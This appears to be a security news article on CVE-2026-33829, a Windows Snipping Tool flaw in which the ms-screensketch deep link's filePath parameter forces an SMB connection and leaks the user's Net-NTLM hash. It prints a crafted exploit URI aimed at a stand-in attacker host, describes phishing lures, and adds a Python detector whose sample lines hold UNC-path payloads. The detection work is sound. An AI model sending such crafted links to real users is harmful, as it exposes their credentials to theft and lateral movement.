Tracked as CVE-2026-33829, the issue was discovered by security researcher Margaruga from the BlackArrowSec Red Team and is documented in their redteam-research repository.
The flaw stems from a deep link protocol registered by the Snipping Tool application, identified as ms-screensketch.
This URI scheme includes a parameter named filePath, which, when improperly validated, can coerce Windows into connecting to a remote SMB share.
As a result, the user’s Net-NTLM hash is transmitted to the attacker-controlled server.
In essence, the vulnerability enables an NTLM leak and an authentication spoofing scenario where sensitive credentials can be extracted across the network without direct access to the affected system.
Exploiting CVE-2026-33829 requires user interaction; however, even minimal engagement, such as opening a specially crafted link or visiting a malicious webpage, is enough to trigger the issue.
Security analysts at BlackArrowSec demonstrated that opening a crafted URI like:
ms-screensketch:edit?&filePath=\attacker.labimage.png&isTemporary=false&saved=true&source=Toast
forces the Snipping Tool to initiate an SMB connection to the remote address, effectively disclosing the NTLM response from the current Windows account.
The vulnerability offers attackers strong social engineering opportunities. A threat actor could trick users into editing a supposedly legitimate image file, like a company wallpaper or ID photo, via malicious URLs such as:
https://snip.example.com/wallpaper/image.png
While it seems to open locally in Snipping Tool, the app silently makes an NTLM authentication attempt in the background, exposing credentials.
Though the flaw requires user interaction, it poses a serious risk on enterprise networks where NTLM hash leakage can lead to impersonation or lateral movement.
Spoofing attacks leveraging NTLM responses often serve as a stepping stone for further credential abuse or privilege escalation.
Microsoft released a security update on April 14, 2026, addressing this vulnerability. Users are strongly advised to apply all patches included in the April 2026 Windows Security Update immediately.
Further information and video proof-of-concept are available in the GitHub advisory and demo file CVE-2026-33829.mp4.
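For hunting alongside the patch, the check below flags ms-screensketch deep links whose filePath points at a remote host, the pattern described above. It is an added example, not code from BlackArrowSec or Microsoft; the function names and the sample lines (files.example.test) are constructed for illustration, and it assumes the links are available as text from mail, proxy or process command-line logs.

```python
import re
from urllib.parse import parse_qsl, unquote

# Deep links using the scheme named in the advisory, as they appear in text.
URI_RE = re.compile(r"ms-screensketch:[^\s\"'<>]+", re.IGNORECASE)
# \\host\share, plus the \\?\UNC\host\share device form.
UNC_RE = re.compile(r"^\\\\(?:[?.]\\UNC\\)?([^\\]+)", re.IGNORECASE)

def remote_host(file_path):
    """Return the host a filePath value points at, or None for a local path."""
    p = unquote(file_path).strip()   # second decode catches double encoding
    p = p.replace("/", "\\")         # treat //host/share like \\host\share
    if p.lower().startswith("file:"):
        p = p[5:]                    # file://host/share -> \\host\share
    m = UNC_RE.match(p)
    if not m or m.group(1) in ("?", "."):   # \\?\C:\... and \\.\... are local
        return None
    return m.group(1).lower()

def find_remote_deeplinks(text):
    """Return (uri, host) for every deep link whose filePath is remote."""
    hits = []
    for uri in URI_RE.findall(text):
        query = uri.partition("?")[2]
        # parse_qsl percent-decodes each value once and skips the empty "&" pair.
        for key, value in parse_qsl(query, keep_blank_values=True):
            if key.lower() == "filepath":
                host = remote_host(value)
                if host:
                    hits.append((uri, host))
    return hits

# Constructed sample input (hosts and paths are placeholders).
SAMPLE = [
    r'<a href="ms-screensketch:edit?&filePath=\\files.example.test\share\badge.png'
    r'&isTemporary=false&saved=true&source=Toast">Edit</a>',
    r'ms-screensketch:edit?&filePath=C:\Users\alice\Pictures\shot.png&isTemporary=true',
    'ms-screensketch:edit?filePath=%5C%5Cfiles.example.test%5Cshare%5Ca.png',
    'ms-screensketch:edit?filepath=%255C%255Cfiles.example.test%255Cshare%255Ca.png',
    'MS-ScreenSketch:edit?filePath=file://Files.Example.Test/share/a.png',
    r'ms-screensketch:edit?filePath=\\?\C:\Temp\a.png',
]

if __name__ == "__main__":
    for uri, host in find_remote_deeplinks("\n".join(SAMPLE)):
        print(f"remote filePath -> {host}: {uri}")
```

Local drive paths and `\\?\C:\...` device paths are not reported, so ordinary Snipping Tool toast activations stay quiet.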
The post Windows Snipping Tool Vulnerability Allows Attackers to Perform Network Spoofing appeared first on Cyber Security News.